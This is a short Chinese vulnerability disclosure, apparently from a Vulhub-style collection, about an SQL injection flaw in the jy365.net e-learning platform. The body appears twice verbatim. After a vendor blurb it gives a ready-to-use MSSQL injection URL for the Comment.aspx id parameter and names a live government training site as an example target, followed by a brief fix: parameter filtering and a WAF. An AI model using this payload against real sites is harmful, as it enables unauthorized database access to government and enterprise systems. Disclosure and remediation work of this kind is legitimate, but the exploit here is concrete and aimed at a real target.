VULHUB ™

### 0x01 框架介绍 影响厂商：杭州精英在线教育科技有限公司 官方主页：www.jy365.net 公司是浙江省经贸委唯一推荐的在线学习平台建设机构，浙江省内70%的百强市、县政府采用精英在线学习平台。与此同时，公司成功地为中国境内超过100家大、中型企业、政府机关和高校提供了e-Learning解决方案。客户选用精英在线的学习管理系统以及定制课件的服务，是基于精英在线能够为他们提供高质量的学习管理平台和定制课程服务，满足他们独特的培训需求和目的，公司为客户提供结合技术、课件和服务的综合、高效的e-Learning解决方案。通过中国境内不同行业的企业、不同机关和高校及超过100万以上的用户使用，证明培训项目实施的效果是成功有效的，结果是令客户满意的。  典型客户：  ### 0x02 漏洞利用 /Comment/Comment.aspx?id 存在sql注入漏洞 利用方式： http://site/Comment/Comment.aspx?id=15' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1 案例：http://hlbe.jy365.net （呼伦贝尔干部教育在线）   Pocsuite证明：  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品

### 0x01 框架介绍 影响厂商：杭州精英在线教育科技有限公司 官方主页：www.jy365.net 公司是浙江省经贸委唯一推荐的在线学习平台建设机构，浙江省内70%的百强市、县政府采用精英在线学习平台。与此同时，公司成功地为中国境内超过100家大、中型企业、政府机关和高校提供了e-Learning解决方案。客户选用精英在线的学习管理系统以及定制课件的服务，是基于精英在线能够为他们提供高质量的学习管理平台和定制课程服务，满足他们独特的培训需求和目的，公司为客户提供结合技术、课件和服务的综合、高效的e-Learning解决方案。通过中国境内不同行业的企业、不同机关和高校及超过100万以上的用户使用，证明培训项目实施的效果是成功有效的，结果是令客户满意的。  典型客户：  ### 0x02 漏洞利用 /Comment/Comment.aspx?id 存在sql注入漏洞 利用方式： http://site/Comment/Comment.aspx?id=15' and 1=char(sys.fn_varbintohexstr(hashbytes('MD5','1'))) and '1'='1 案例：http://hlbe.jy365.net （呼伦贝尔干部教育在线）   Pocsuite证明：  ### 0x03 修复方案 1、过滤漏洞文件参数 2、使用加速乐等防护产品